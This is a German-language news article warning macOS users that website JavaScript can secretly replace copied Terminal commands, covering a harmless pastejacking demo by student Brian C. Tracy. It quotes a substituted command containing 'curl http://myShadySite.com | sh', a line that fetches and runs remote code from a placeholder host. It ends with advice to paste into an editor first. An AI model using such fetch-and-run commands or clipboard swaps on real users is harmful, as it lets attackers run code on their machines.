So ziemlich jeder Mac-Besitzer dürfte im Lauf der Jahre irgendwann einmal die Terminal-App genutzt haben, etwa um eine Systemeinstellung vorzunehmen oder einen Fehler zu beheben. Die Kommandozeile des unter der Oberfläche von macOS arbeitenden Unix-Systems bietet äußerst mächtige Befehle, deren Anwendung allerdings gute Systemkenntnisse erfordert. Weniger versierte Anwender greifen daher gern auf Anleitungen und vorgefertigte Anweisungen zurück, welche in großer Zahl im Internet zu finden sind.


Copy & Paste kann gefährlich sein
Die in Foren oder auf Support-Webseiten zu findenden Terminal-Befehle lassen sich einfach per Copy & Paste in die Kommandozeile übertragen. Dabei ist allerdings Vorsicht geboten, denn nicht in jedem Fall landet die im Browser angezeigte Anweisung auch tatsächlich in der Zwischenablage. Angreifer (oder Witzbolde) können nämlich mithilfe von JavaScript auf einfache Art und Weise den Kopiervorgang manipulieren und so im schlimmsten Fall sogar Daten abgreifen oder Schadcode einschleusen.

Befehl wird sofort nach dem Einfügen ausgeführt
Eine - natürlich harmlose – Demonstration dieses potenziell gefährlichen Verfahrens hat jetzt der US-amerikanische Informatikstudent Brian C. Tracy auf seinen Internetseiten veröffentlicht. Unter der Überschrift "Don't Copy Paste Into A Shell" ist dort ein einfacher Befehl für die Kommandozeile zu finden, der sich durch Markieren und Kopieren in die Zwischenablage übertragen lässt. Durch den im Quelltext der Seite enthaltenen JavaScript-Code landet allerdings nicht der angezeigte Text $ echo "looks safe to me!" im Speicher, sondern eine gänzlich andere Anweisung: echo "this could have been [curl http://myShadySite.com | sh]". Diese enthält zudem am Ende einen Wagenrücklauf, sodass der Befehl unmittelbar nach dem Einfügen ins Terminal ausgeführt wird. Der Nutzer hat somit keine Möglichkeit, ins Geschehen einzugreifen.

Manipulation ist zunächst nicht sichtbar
Tracy hat auf seiner Webseite auch den JavaScript-Code veröffentlicht, welcher die Zwischenablage manipuliert. Dieser besteht im Kern aus lediglich einer einzigen Anweisung und funktioniert auf allen Desktop-Betriebssystemen, aber auch auf iOS und iPadOS. Die während des Kopiervorgangs erfolgende Veränderung des Inhalts ist zunächst nicht sichtbar und manifestiert sich erst beim Einfügen. Mit dem Verfahren lassen sich naturgemäß nicht nur Terminal-Befehle manipulieren, auch alle anderen Inhalte wie etwa URLs können verfälscht werden. Nutzer können sich allerdings mit einer einfachen Maßnahme schützen, indem sie die Zwischenablage zunächst in einen Editor einfügen und dann den Inhalt mit dem auf der Webseite angezeigten Text vergleichen.